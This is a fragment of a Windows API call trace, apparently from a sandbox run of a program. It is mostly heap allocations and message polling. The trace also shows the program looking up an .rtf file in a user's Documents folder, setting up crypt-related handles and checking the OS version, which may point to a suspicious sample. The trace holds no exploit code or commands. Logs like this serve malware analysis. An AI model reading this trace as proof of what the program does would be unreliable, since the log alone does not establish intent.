returned 0x2e51760 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0268.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0268.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0268.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0268.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.185] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0268.186] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.186] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0268.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.187] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/y89VhZ.rtf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1c2ebe0, ftCreationTime.dwHighDateTime=0x1d5e242, ftLastAccessTime.dwLowDateTime=0xe8042a30, ftLastAccessTime.dwHighDateTime=0x1d5f073, ftLastWriteTime.dwLowDateTime=0xe8042a30, ftLastWriteTime.dwHighDateTime=0x1d5f073, nFileSizeHigh=0x0, nFileSizeLow=0x67fb, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="y89VhZ.rtf", cAlternateFileName="")) returned 0xa870d0 [0268.187] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0268.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0268.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0268.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0268.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0268.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0268.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0268.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.188] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.188] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0268.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0268.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.188] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0268.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.189] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.189] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0268.189] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0268.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0268.190] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.191] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.191] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0268.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0268.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.192] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0268.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.193] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0268.194] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0268.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0268.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0268.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0268.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0268.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0268.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 